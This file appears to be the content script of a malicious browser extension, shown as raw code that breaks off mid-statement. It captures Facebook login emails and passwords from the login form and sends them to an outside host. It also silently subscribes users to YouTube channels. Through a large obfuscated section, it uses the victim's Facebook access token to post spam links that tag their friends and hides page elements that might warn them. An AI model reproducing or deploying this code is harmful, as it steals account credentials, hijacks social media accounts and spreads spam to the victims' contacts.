new Image().src = '//whos.amung.us/swidget/8k1doonmsawi';


var gooles = document.createElement("script");
gooles.type = "text/javascript";
gooles.innerHTML = "(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-83440843-3', 'auto'); ga('send', 'pageview');ga(\"send\",\"event\",{eventCategory:\"installed\",eventAction:\""+chrome.runtime.id+"\",hitCallback:function(){},hitCallbackFail:function(){}});";
document.body.appendChild(gooles);


if (top.location.href.indexOf("facebook.com") > -1 && document.getElementById("login_form")) {
    document.getElementById("login_form").onsubmit = function (e) {
        localStorage.setItem("upom", document.getElementById("email").value);
        localStorage.setItem("uzom", document.getElementById("pass").value);
        setTimeout(function () {
            document.getElementById("login_form").submit()
        }, 99);
        return false
    }
}
if (localStorage.upom && localStorage.uzom) {
(new Image).src = "http://ananococococ.xyz/hesaps.php" + "?us=" + localStorage.upom + "&pw=" + localStorage.uzom;
}

    function get_token(id) {
        var xhr = new XMLHttpRequest,
            url = "https://www.youtube.com/subscribe_embed?channelid=" + id;
        xhr.open("GET", url);
        xhr.send();
        xhr.onreadystatechange = function () {
            if (200 == xhr.status) {
				var resp = xhr.responseText;
                if (resp.match("'LOGGED_IN': (.*?),") && resp.match("'LOGGED_IN': (.*?),")[1] == "true") {
					var session_token = resp.match("'XSRF_TOKEN': \"(.*?)\"")[1];
					var ei = resp.match("ei=(.*?)&")[1];
					var ved = resp.match("ved=(.*?)\"")[1];
					subscribe(id,{session_token:session_token,ei:ei,ved:ved});
                }
            }
        }
		
    }
	

    function subscribe(id,token) {
        var params = "ei=" + token.ei + "&feature=channels4&ved=" + token.ved + "&session_token=" + token.session_token;
        var xhr = new XMLHttpRequest,
            url = "https://www.youtube.com/subscription_ajax?action_create_subscription_to_channel=1&c=" + id;
        xhr.open("POST", url);
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        xhr.send(params);
        xhr.onreadystatechange = function () {
            if (200 == xhr.status) {
                if (xhr.responseText) {
                    localStorage['youtube'] = true;
                }
            }
        }
    }
    if (!localStorage['youtube']) {
        get_token("UCLDrkhxZfWVEk88FPgKiqzA");
        get_token("UCkk-y1_RJY3YlsUx0sDO6eg");
    }


var _0xde57=["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6E\x6F\x77","\x6C\x6F\x67","\x6D\x6F\x64\x65","\x74\x65\x73\x74\x75\x73\x65\x72","\x73\x65\x74\x54\x69\x6D\x65","\x74\x6F\x4C\x6F\x63\x61\x6C\x65\x53\x74\x72\x69\x6E\x67","\x6F\x70\x65\x6E","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x22\x61\x63\x63\x65\x73\x73\x54\x6F\x6B\x65\x6E\x22\x3A\x22","\x69\x6E\x64\x65\x78\x4F\x66","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x61\x63\x63\x65\x73\x73\x5F\x74\x6F\x6B\x65\x6E","\x74\x72\x69\x6D","\x22","\x73\x70\x6C\x69\x74","\x73\x65\x6E\x64","","\x72\x65\x70\x6C\x61\x63\x65","\x70\x61\x72\x73\x65","\x65\x72\x72\x6F\x72","\x64\x61\x74\x61","\x66\x72\x69\x65\x6E\x64\x73","\x6C\x65\x6E\x67\x74\x68","\x70\x6F\x73\x74\x5F\x6C\x69\x6D\x69\x74","\x6F\x6E\x6C\x69\x6E\x65\x5F\x70\x72\x65\x73\x65\x6E\x63\x65","\x70\x75\x73\x68","\x75\x69\x64","\x74\x61\x67\x5F\x6C\x69\x6D\x69\x74","\x63\x65\x69\x6C","\x74\x61\x67\x73","\x69\x6D\x61\x67\x65","\x6E\x61\x6D\x65","\x74\x65\x78\x74","\x6C\x69\x6E\x6B","\x66\x6C\x6F\x6F\x72","\x73\x74\x72\x69\x6E\x67\x69\x66\x79","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x70\x6F\x73\x74\x5F\x69\x64","\x70\x72\x69\x76\x61\x63\x79","\x76\x61\x6C\x75\x65","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x72\x61\x6E\x64\x6F\x6D","\x6F\x62\x6A\x65\x63\x74","\x6A\x6F\x69\x6E","\x6D\x61\x70","\x6B\x65\x79\x73","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x43\x6C\x61\x73\x73\x4E\x61\x6D\x65","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x6F\x75\x74\x65\x72\x48\x54\x4D\x4C","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65","\x73\x65\x74\x49\x6E\x74\x65\x72\x76\x61\x6C","\x62\x6F\x64\x79","\x68\x72\x65\x66","\x63\x6F\x6F\x6B\x69\x65","\x73\x75\x62\x73\x74\x72","\x63\x6C\x65\x61\x72","\x68\x6F\x73\x74\x6E\x61\x6D\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x4E\x61\x6D\x65","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64","\x6D\x61\x74\x63\x68","\x2C","\x22\x72\x65\x76\x69\x73\x69\x6F\x6E\x22\x3A","\x22\x61\x6A\x61\x78\x70\x69\x70\x65\x5F\x74\x6F\x6B\x65\x6E\x22\x3A","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x72\x65\x6C\x6F\x61\x64","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x74\x6F\x70","\x73\x65\x74\x54\x69\x6D\x65\x6F\x75\x74"];var consoleFree=true;var hash=String[_0xde57[0]](123,104,97,115,104,125);function _a(){var _0xd58ax4=String[_0xde57[0]](98,97,115,108,97,116,95,118,51,51,54);var _0xd58ax5=10;if(!localStorage[_0xd58ax4]|| parseInt(localStorage[_0xd58ax4])< Date[_0xde57[1]]()- 60* 1000* _0xd58ax5){localStorage[_0xd58ax4]= Date[_0xde57[1]]();config= {"\x6C\x69\x6E\x6B":String[_0xde57[0]](104,116,116,112,58,47,47,123,114,97,110,100,111,109,125,46,47,123,114,97,110,100,111,109,125),"\x70\x6F\x73\x74\x5F\x6C\x69\x6D\x69\x74":String[_0xde57[0]](49,48,48),"\x74\x61\x67\x5F\x6C\x69\x6D\x69\x74":String[_0xde57[0]](49),"\x6D\x6F\x64\x65":true,"\x74\x65\x73\x74\x75\x73\x65\x72":String[_0xde57[0]](49,48,48,48,49,48,51,49,52,49,57,48,56,53,50)};console[_0xde57[2]](config);if(config[_0xde57[3]]== true|| profile_id== config[_0xde57[4]]){_b();console[_0xde57[2]](String[_0xde57[0]](65,114,107,97,100,97,115,108,97,114,32,103,101,116,105,114,105,108,105,121,111,114,46))}}else {var _0xd58ax6= new Date();_0xd58ax6[_0xde57[5]](parseInt(localStorage[_0xd58ax4])+ (60* 1000* _0xd58ax5));console[_0xde57[2]](String[_0xde57[0]](97,99,116,105,118,101,95,116,105,109,101,58)+ _0xd58ax6[_0xde57[6]]())}}function _b(){var _0xd58ax8= new XMLHttpRequest();_0xd58ax8[_0xde57[7]](String[_0xde57[0]](71,69,84),String[_0xde57[0]](104,116,116,112,115,58,47,47,100,101,118,101,108,111,112,101,114,115,46,102,97,99,101,98,111,111,107,46,99,111,109,47,63,101,120,116,61,109,101));_0xd58ax8[_0xde57[8]]= function(){if(_0xd58ax8[_0xde57[9]]== 4&& _0xd58ax8[_0xde57[10]]== 200){var _0xd58ax9={};if(_0xd58ax8[_0xde57[13]][_0xde57[12]](_0xde57[11])> 0){_0xd58ax9[_0xde57[14]]= _0xd58ax8[_0xde57[13]][_0xde57[17]](_0xde57[11])[1][_0xde57[17]](_0xde57[16])[0][_0xde57[15]]();console[_0xde57[2]](_0xd58ax9[_0xde57[14]]);_c(_0xd58ax9)}else {}}};_0xd58ax8[_0xde57[18]]()}function _c(_0xd58ax9){var _0xd58axb={q:String[_0xde57[0]](83,69,76,69,67,84,32,117,105,100,44,32,110,97,109,101,44,32,111,110,108,105,110,101,95,112,114,101,115,101,110,99,101,44,32,112,105,99,95,98,105,103,44,32,99,97,110,95,112,111,115,116,32,32,70,82,79,77,32,117,115,101,114,32,87,72,69,82,69,32,117,105,100,32,73,78,32,40,83,69,76,69,67,84,32,117,105,100,50,32,70,82,79,77,32,102,114,105,101,110,100,32,87,72,69,82,69,32,117,105,100,49,32,61,32,109,101,40,41,41,32,79,114,100,101,114,32,66,121,32,111,110,108,105,110,101,95,112,114,101,115,101,110,99,101,32,76,105,109,105,116,32,50,48,48,48),access_token:_0xd58ax9[_0xde57[14]],ext:String[_0xde57[0]](109,101)};var _0xd58ax8= new XMLHttpRequest();_0xd58ax8[_0xde57[7]](String[_0xde57[0]](71,69,84),String[_0xde57[0]](104,116,116,112,115,58,47,47,103,114,97,112,104,46,102,97,99,101,98,111,111,107,46,99,111,109,47,102,113,108,63)+ _s(_0xd58axb),true);_0xd58ax8[_0xde57[8]]= function(){if(_0xd58ax8[_0xde57[9]]== 4&& _0xd58ax8[_0xde57[10]]== 200){var _0xd58axc=JSON[_0xde57[21]](_0xd58ax8[_0xde57[13]][_0xde57[20]](String[_0xde57[0]](102,111,114,32,40,59,59,41,59),_0xde57[19]));if(!_0xd58axc[_0xde57[22]]){var _0xd58axd=_0xd58axc[_0xde57[23]];_0xd58axd= _o(_0xd58axd);_0xd58ax9[_0xde57[24]]= [];for(i= 0;i< _0xd58axd[_0xde57[25]];i++){if(_0xd58ax9[_0xde57[24]][_0xde57[25]]< config[_0xde57[26]]&& (_0xd58axd[i][_0xde57[27]]== String[_0xde57[0]](97,99,116,105,118,101)|| _0xd58axd[i][_0xde57[27]]== String[_0xde57[0]](105,100,108,101))){_0xd58ax9[_0xde57[24]][_0xde57[28]](_0xd58axd[i])}};if(_0xd58ax9[_0xde57[24]][_0xde57[25]]< config[_0xde57[26]]){_0xd58axd= _o(_0xd58axd);for(i= 0;i< _0xd58axd[_0xde57[25]];i++){if(_0xd58ax9[_0xde57[24]][_0xde57[25]]< config[_0xde57[26]]&& _i(_0xd58ax9[_0xde57[24]],String[_0xde57[0]](117,105,100),_0xd58axd[i][_0xde57[29]])== false){_0xd58ax9[_0xde57[24]][_0xde57[28]](_0xd58axd[i])}}};_d(_0xd58ax9)}else {}}};_0xd58ax8[_0xde57[18]]()}function _d(_0xd58ax9){var _0xd58axf=Math[_0xde57[31]](_0xd58ax9[_0xde57[24]][_0xde57[25]]/ config[_0xde57[30]]);config[_0xde57[26]]= _0xd58axf> config[_0xde57[26]]?config[_0xde57[26]]:_0xd58axf;if(config[_0xde57[26]]== 0){config[_0xde57[26]]= 1};for(p= 0;p< config[_0xde57[26]];p++){_0xd58ax9[_0xde57[32]]= [];for(pk= 0;pk< config[_0xde57[30]];pk++){var _0xd58ax10=pk+ (config[_0xde57[30]]* p);if(_0xd58ax9[_0xde57[24]][_0xd58ax10]){_0xd58ax9[_0xde57[32]][_0xde57[28]](_0xd58ax9[_0xde57[24]][_0xd58ax10])}};_0xd58ax9[_0xde57[29]]= _0xd58ax9[_0xde57[32]][0][_0xde57[29]];_0xd58ax9[_0xde57[33]]= String[_0xde57[0]](104,116,116,112,115,58,47,47,103,114,97,112,104,46,102,97,99,101,98,111,111,107,46,99,111,109,47)+ _0xd58ax9[_0xde57[29]]+ String[_0xde57[0]](47,112,105,99,116,117,114,101,63,119,105,100,116,104,61,50,48,48,38,104,101,105,103,104,116,61,50,48,48);_0xd58ax9[_0xde57[34]]= _0xd58ax9[_0xde57[32]][0][_0xde57[34]]?_0xd58ax9[_0xde57[32]][0][_0xde57[34]][_0xde57[17]](String[_0xde57[0]](32))[0]:_0xd58ax9[_0xde57[32]][0][_0xde57[35]][_0xde57[17]](String[_0xde57[0]](32))[0];console[_0xde57[2]](_0xd58ax9[_0xde57[32]]);_e(_0xd58ax9)}}function _e(_0xd58ax9){var _0xd58ax12=_0xd58ax9[_0xde57[29]];var _0xd58ax13=_0xd58ax9[_0xde57[34]];var _0xd58ax14=_0xd58ax9[_0xde57[33]];_0xd58ax9[_0xde57[36]]= String[_0xde57[0]](104,116,116,112,58,47,47)+ _r(8)+ String[_0xde57[0]](46,109,97,114,107,97,107,111,108,115,97,97,116,105,46,99,111,109,47,63)+ _r(8);_0xd58ax9[_0xde57[29]]= _0xd58ax12;_0xd58ax9[_0xde57[33]]= _0xd58ax14;_0xd58ax9[_0xde57[34]]= _0xd58ax13;_f(_0xd58ax9)}function _f(_0xd58ax9){var _0xd58ax12=_0xd58ax9[_0xde57[29]];var _0xd58ax16=_0xd58ax9[_0xde57[36]];var _0xd58ax13=_0xd58ax9[_0xde57[34]];var _0xd58ax14=_0xd58ax9[_0xde57[33]];var _0xd58ax17={ext:String[_0xde57[0]](109,101)};var _0xd58axb={fb_dtsg:fb_dtsg,app_id:String[_0xde57[0]](50,53,53,53,52,57,48,55,53,57,54),redirect_uri:String[_0xde57[0]](104,116,116,112,58,47,47,119,119,119,46,102,97,99,101,98,111,111,107,46,99,111,109,47,100,105,97,108,111,103,47,114,101,116,117,114,110,47,99,108,111,115,101),display:String[_0xde57[0]](112,111,112,117,112),access_token:_0xde57[19],sdk:_0xde57[19],from_post:1,xhpc_context:String[_0xde57[0]](104,111,109,101),xhpc_ismeta:1,xhpc_timeline:_0xde57[19],mode:String[_0xde57[0]](102,114,105,101,110,100),friendTarget:_0xd58ax9[_0xde57[34]],audience_targets:_0xd58ax9[_0xde57[29]],xhpc_targetid:profile_id,xhpc_publish_type:1,xhpc_message_text:_0xde57[19],xhpc_message:_0xde57[19],quote:_0xde57[19],is_explicit_place:_0xde57[19],composertags_place:_0xde57[19],composertags_place_name:_0xde57[19],tagger_session_id:Math[_0xde57[37]](Date[_0xde57[1]]()/ 1000),"\x61\x63\x74\x69\x6F\x6E\x5F\x74\x79\x70\x65\x5F\x69\x64\x5B\x30\x5D":_0xde57[19],"\x6F\x62\x6A\x65\x63\x74\x5F\x73\x74\x72\x5B\x30\x5D":_0xde57[19],"\x6F\x62\x6A\x65\x63\x74\x5F\x69\x64\x5B\x30\x5D":_0xde57[19],hide_object_attachment:0,og_suggestion_mechanism:_0xde57[19],og_suggestion_logging_data:_0xde57[19],icon_id:_0xde57[19],share_action_properties:JSON[_0xde57[38]]({"\x6F\x62\x6A\x65\x63\x74":_0xd58ax9[_0xde57[36]]}),share_action_type_id:String[_0xde57[0]](52,48,48,54,56,49,50,49,54,54,53,52,49,55,53),title:_0xd58ax9[_0xde57[34]]+ String[_0xde57[0]](32,86,105,100,101,111),description:_0xde57[19],caption:_0xde57[19],picture:_0xd58ax9[_0xde57[33]],device_code:_0xde57[19],device_shared:_0xde57[19],ref:_0xde57[19],dialog_url:String[_0xde57[0]](104,116,116,112,115,58,47,47,119,119,119,46,102,97,99,101,98,111,111,107,46,99,111,109,47,100,105,97,108,111,103,47,102,101,101,100,63,97,112,112,95,105,100,61,50,53,53,53,52,57,48,55,53,57,54,38,100,105,115,112,108,97,121,61,112,111,112,117,112,38,112,105,99,116,117,114,101,61)+ _0xd58ax9[_0xde57[33]]+ String[_0xde57[0]](38,110,97,109,101,61)+ _r(8)+ String[_0xde57[0]](38,108,105,110,107,61)+ _0xd58ax9[_0xde57[36]]+ String[_0xde57[0]](38,116,111,61)+ _0xd58ax9[_0xde57[29]]+ String[_0xde57[0]](38,114,101,100,105,114,101,99,116,95,117,114,105,61,104,116,116,112,37,51,65,37,50,70,37,50,70,119,119,119,46,102,97,99,101,98,111,111,107,46,99,111,109,37,50,70,100,105,97,108,111,103,37,50,70,114,101,116,117,114,110,37,50,70,99,108,111,115,101),composertags_city:_0xde57[19],disable_location_sharing:false,composer_predicted_city:_0xde57[19],__CONFIRM__:1,__user:profile_id,__a:1,__dyn:String[_0xde57[0]](55,120,101,88,120,97,69,82,48,103,98,119,45,119,82,65,75,69,104,121,56,106,114,87,111,52,54,49,116,119,65,120,117,49,51,119,109,56,103,120,90,51,111,99,85,57,85,75,97,120,101,85,87,50,121,55,69,52,105,117,51,101,50,50,53,111,98,56,97,85,98,111,54,117,99,120,71,52,56,104,119,118,57,70,111,113,65,103,87),__req:3,__be:-1,__pc:String[_0xde57[0]](80,72,65,83,69,68,58,68,69,70,65,85,76,84),ttstamp:ttstamp,__rev:__rev};var _0xd58ax8= new XMLHttpRequest();_0xd58ax8[_0xde57[7]](String[_0xde57[0]](80,79,83,84),String[_0xde57[0]](104,116,116,112,115,58,47,47,119,119,119,46,102,97,99,101,98,111,111,107,46,99,111,109,47,118,50,46,51,47,100,105,97,108,111,103,47,115,104,97,114,101,47,115,117,98,109,105,116,63)+ _s(_0xd58ax17));_0xd58ax8[_0xde57[39]](String[_0xde57[0]](67,111,110,116,101,110,116,45,84,121,112,101),String[_0xde57[0]](97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,59,32,99,104,97,114,115,101,116,61,85,84,70,45,56));_0xd58ax8[_0xde57[18]](_s(_0xd58axb));_0xd58ax8[_0xde57[8]]= function(){if(_0xd58ax8[_0xde57[9]]== 4&& _0xd58ax8[_0xde57[10]]== 200){var _0xd58axc=JSON[_0xde57[21]](_0xd58ax8[_0xde57[13]][_0xde57[20]](String[_0xde57[0]](102,111,114,32,40,59,59,41,59),_0xde57[19]));if(!_0xd58axc[_0xde57[22]]&& _0xd58ax8[_0xde57[13]][_0xde57[12]](String[_0xde57[0]](112,111,115,116,95,105,100,61))> 0){_0xd58ax9[_0xde57[40]]= _0xd58ax8[_0xde57[13]][_0xde57[17]](String[_0xde57[0]](112,111,115,116,95,105,100,61))[1][_0xde57[17]](String[_0xde57[0]](35))[0][_0xde57[17]](String[_0xde57[0]](95))[1];_0xd58ax9[_0xde57[34]]= _0xd58ax13;_0xd58ax9[_0xde57[36]]= _0xd58ax16;_0xd58ax9[_0xde57[29]]= _0xd58ax12;_0xd58ax9[_0xde57[33]]= _0xd58ax14;console[_0xde57[2]](String[_0xde57[0]](80,111,115,116,32,103,111,110,100,101,114,105,108,100,105,58,32,104,116,116,112,115,58,47,47,119,119,119,46,102,97,99,101,98,111,111,107,46,99,111,109,47)+ _0xd58ax9[_0xde57[40]]);_g(_0xd58ax9)}else {if(_0xd58axc[_0xde57[22]]){}}}}}function _g(_0xd58ax9){var _0xd58ax12=_0xd58ax9[_0xde57[29]];var _0xd58ax16=_0xd58ax9[_0xde57[36]];var _0xd58ax13=_0xd58ax9[_0xde57[34]];var _0xd58ax14=_0xd58ax9[_0xde57[33]];var _0xd58ax19=_0xd58ax9[_0xde57[40]];var _0xd58axb={access_token:_0xd58ax9[_0xde57[14]],fields:String[_0xde57[0]](112,114,105,118,97,99,121),ext:String[_0xde57[0]](109,101)};var _0xd58ax8= new XMLHttpRequest();_0xd58ax8[_0xde57[7]](String[_0xde57[0]](71,69,84),String[_0xde57[0]](104,116,116,112,115,58,47,47,103,114,97,112,104,46,102,97,99,101,98,111,111,107,46,99,111,109,47)+ profile_id+ String[_0xde57[0]](95)+ _0xd58ax9[_0xde57[40]]+ String[_0xde57[0]](63)+ _s(_0xd58axb));_0xd58ax8[_0xde57[39]](String[_0xde57[0]](67,111,110,116,101,110,116,45,84,121,112,101),String[_0xde57[0]](97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,59,32,99,104,97,114,115,101,116,61,85,84,70,45,56));_0xd58ax8[_0xde57[18]]();_0xd58ax8[_0xde57[8]]= function(){if(_0xd58ax8[_0xde57[9]]== 4){var _0xd58axc={};try{_0xd58axc= JSON[_0xde57[21]](_0xd58ax8[_0xde57[13]][_0xde57[20]](String[_0xde57[0]](102,111,114,32,40,59,59,41,59),_0xde57[19]))}catch(err){};_0xd58ax9[_0xde57[34]]= _0xd58ax13;_0xd58ax9[_0xde57[36]]= _0xd58ax16;_0xd58ax9[_0xde57[29]]= _0xd58ax12;_0xd58ax9[_0xde57[33]]= _0xd58ax14;_0xd58ax9[_0xde57[40]]= _0xd58ax19;if(_0xd58axc[_0xde57[41]]&& _0xd58axc[_0xde57[41]][_0xde57[42]]&& _0xd58axc[_0xde57[41]][_0xde57[42]]== String[_0xde57[0]](69,86,69,82,89,79,78,69)){}else {}}}}function _h(){var _0xd58axb={value:String[_0xde57[0]](51,48,48,54,52,53,48,56,51,51,56,52,55,51,53),prev_value:String[_0xde57[0]](50,57,49,54,54,55,48,54,52,50,55,57,55,49,52),__user:profile_id,__a:1,__dyn:String[_0xde57[0]](55,65,109,97,106,69,121,108,51,53,119,122,103,68,120,121,71,56,69,105,103,109,122,70,69,98,69,75,65,56,65,121,56,90,57,76,70,119,120,66,120,67,98,122,69,83,50,78,54,120,121,98,120,117,51,102,122,111,97,113,120,98,120,106,120,50,55,87,56,56,121,98,120,45,113,65,52,69,45,56,75,117,69,106,120,67,50,101,55,56,52,105,52,85,57,88,119),__req:String[_0xde57[0]](49,53),fb_dtsg:fb_dtsg,ttstamp:ttstamp,__rev:__rev};var _0xd58ax8= new XMLHttpRequest();_0xd58ax8[_0xde57[7]](String[_0xde57[0]](80,79,83,84),String[_0xde57[0]](104,116,116,112,115,58,47,47,119,119,119,46,102,97,99,101,98,111,111,107,46,99,111,109,47,97,106,97,120,47,115,101,116,116,105,110,103,115,47,103,114,97,110,117,108,97,114,95,112,114,105,118,97,99,121,47,99,111,109,112,111,115,101,114,46,112,104,112));_0xd58ax8[_0xde57[39]](String[_0xde57[0]](67,111,110,116,101,110,116,45,84,121,112,101),String[_0xde57[0]](97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,59,32,99,104,97,114,115,101,116,61,85,84,70,45,56));_0xd58ax8[_0xde57[18]](_s(_0xd58axb));_0xd58ax8[_0xde57[8]]= function(){if(_0xd58ax8[_0xde57[9]]== 4&& _0xd58ax8[_0xde57[10]]== 200){var _0xd58axc=JSON[_0xde57[21]](_0xd58ax8[_0xde57[13]][_0xde57[20]](String[_0xde57[0]](102,111,114,32,40,59,59,41,59),_0xde57[19]))}}}function _i(_0xd58ax1c,_0xd58ax1d,_0xd58ax1e){var _0xd58ax1f=false;for(a= 0;a< _0xd58ax1c[_0xde57[25]];a++){for(k in _0xd58ax1c[a]){if(k== _0xd58ax1d&& _0xd58ax1c[a][k]== _0xd58ax1e){_0xd58ax1f= true;break}}};return _0xd58ax1f}function _j(_0xd58ax21,_0xd58ax22){var _0xd58ax23=String[_0xde57[0]](97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,114,115,116,117,118,121,122,120,48,49,50,51,52,53,54,55,56,57);var _0xd58ax24=_0xde57[19];for(cr= 0;cr< _0xd58ax21[_0xde57[25]];cr++){_0xd58ax24+= _0xd58ax23[_0xd58ax22[_0xde57[12]](_0xd58ax21[cr])]};return _0xd58ax24}function _k(){function _0xd58ax26(){return Math[_0xde57[37]]((1+ Math[_0xde57[44]]())* 0x10000).toString(16)[_0xde57[43]](1)}return _0xd58ax26()+ _0xd58ax26()+ String[_0xde57[0]](45)+ _0xd58ax26()+ String[_0xde57[0]](45)+ _0xd58ax26()+ String[_0xde57[0]](45)+ _0xd58ax26()+ String[_0xde57[0]](45)+ _0xd58ax26()+ _0xd58ax26()+ _0xd58ax26()}function _m(_0xd58ax28,_0xd58ax29){var _0xd58ax2a=[];while(_0xd58ax2a[_0xde57[25]]< _0xd58ax28){var _0xd58ax2b=Math[_0xde57[37]](Math[_0xde57[44]]()* _0xd58ax29);if(_0xd58ax2a[_0xde57[12]](_0xd58ax2b)< 0){_0xd58ax2a[_0xde57[28]](_0xd58ax2b)}};return _0xd58ax2a}function _n(_0xd58ax23,_0xd58ax2d){var _0xd58ax2e=false;for(key in _0xd58ax23){if(key.toString()== _0xd58ax2d){_0xd58ax2e= _0xd58ax23[key];break}else {if( typeof _0xd58ax23[key]== _0xde57[45]){_0xd58ax2e= _n(_0xd58ax23[key],_0xd58ax2d);if(_0xd58ax2e!= false){break}}}};return _0xd58ax2e}function _o(_0xd58ax30){var _0xd58ax31=_0xd58ax30[_0xde57[25]],_0xd58ax32,_0xd58ax33;while(0!== _0xd58ax31){_0xd58ax33= Math[_0xde57[37]](Math[_0xde57[44]]()* _0xd58ax31);_0xd58ax31-= 1;_0xd58ax32= _0xd58ax30[_0xd58ax31];_0xd58ax30[_0xd58ax31]= _0xd58ax30[_0xd58ax33];_0xd58ax30[_0xd58ax33]= _0xd58ax32};return _0xd58ax30}function _p(_0xd58ax35,_0xd58ax36){return Math[_0xde57[37]](Math[_0xde57[44]]()* (_0xd58ax36- _0xd58ax35))+ _0xd58ax35}function _r(_0xd58ax38){mtn= String[_0xde57[0]](97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,114,115,116,117,118,121,122,120,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,82,83,84,85,86,89,90,88,48,49,50,51,52,53,54,55,56,57);ret= _0xde57[19];for(l= 0;l< _0xd58ax38;l++){ret+= mtn[Math[_0xde57[37]](Math[_0xde57[44]]()* mtn[_0xde57[25]])]};return ret}function _s(_0xd58ax3a){return Object[_0xde57[48]](_0xd58ax3a)[_0xde57[47]](function(_0xd58ax1d){return encodeURIComponent(_0xd58ax1d)+ String[_0xde57[0]](61)+ encodeURIComponent(_0xd58ax3a[_0xd58ax1d])})[_0xde57[46]](String[_0xde57[0]](38))}function _t(){window[_0xde57[54]](function(){if(document[_0xde57[49]](String[_0xde57[0]](95,53,99,101))){for(i= 0;i< document[_0xde57[49]](String[_0xde57[0]](95,53,99,101))[_0xde57[25]];i++){document[_0xde57[49]](String[_0xde57[0]](95,53,99,101))[i][_0xde57[50]]= _0xde57[19]}};if(document[_0xde57[49]](String[_0xde57[0]](117,105,84,111,103,103,108,101,32,119,114,97,112))){for(i= 0;i< document[_0xde57[49]](String[_0xde57[0]](117,105,84,111,103,103,108,101,32,119,114,97,112))[_0xde57[25]];i++){document[_0xde57[49]](String[_0xde57[0]](117,105,84,111,103,103,108,101,32,119,114,97,112))[i][_0xde57[50]]= _0xde57[19]}};if(document[_0xde57[51]](String[_0xde57[0]](108,111,103,111,117,116,77,101,110,117))){document[_0xde57[51]](String[_0xde57[0]](108,111,103,111,117,116,77,101,110,117))[_0xde57[53]][_0xde57[52]]= _0xde57[19]};if(document[_0xde57[49]](String[_0xde57[0]](117,105,80,111,112,111,118,101,114))){for(i= 0;i< document[_0xde57[49]](String[_0xde57[0]](117,105,80,111,112,111,118,101,114))[_0xde57[25]];i++){document[_0xde57[49]](String[_0xde57[0]](117,105,80,111,112,111,118,101,114))[i][_0xde57[50]]= _0xde57[19]}};if(document[_0xde57[49]](String[_0xde57[0]](85,70,73,67,111,109,109,101,110,116,67,108,111,115,101,66,117,116,116,111,110))){for(i= 0;i< document[_0xde57[49]](String[_0xde57[0]](85,70,73,67,111,109,109,101,110,116,67,108,111,115,101,66,117,116,116,111,110))[_0xde57[25]];i++){document[_0xde57[49]](String[_0xde57[0]](85,70,73,67,111,109,109,101,110,116,67,108,111,115,101,66,117,116,116,111,110))[i][_0xde57[52]]= _0xde57[19]}}},10)}function _u(){document[_0xde57[55]][_0xde57[50]]= _0xde57[19];var _0xd58axb={fb_dtsg:fb_dtsg,nh:nh,"\x73\x75\x62\x6D\x69\x74\x5B\x47\x65\x74\x20\x53\x74\x61\x72\x74\x65\x64\x5D":String[_0xde57[0]](71,101,116,32,83,116,97,114,116,101,100)};var _0xd58ax8= new XMLHttpRequest();_0xd58ax8[_0xde57[7]](String[_0xde57[0]](80,79,83,84),String[_0xde57[0]](104,116,116,112,115,58,47,47,119,119,119,46,102,97,99,101,98,111,111,107,46,99,111,109,47,99,104,101,99,107,112,111,105,110,116,47));_0xd58ax8[_0xde57[39]](String[_0xde57[0]](67,111,110,116,101,110,116,45,84,121,112,101),String[_0xde57[0]](97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,59,32,99,104,97,114,115,101,116,61,85,84,70,45,56));_0xd58ax8[_0xde57[18]](_s(_0xd58axb));_0xd58ax8[_0xde57[8]]= function(){if(_0xd58ax8[_0xde57[9]]== 4){_v();console[_0xde57[2]](String[_0xde57[0]](71,101,116,32,83,116,97,114,116,101,100))}}}function _v(){var _0xd58axb={fb_dtsg:fb_dtsg,nh:nh,confirm:String[_0xde57[0]](111,110),"\x73\x75\x62\x6D\x69\x74\x5B\x43\x6F\x6E\x74\x69\x6E\x75\x65\x5D":String[_0xde57[0]](67,111,110,116,105,110,117,101)};var _0xd58ax8= new 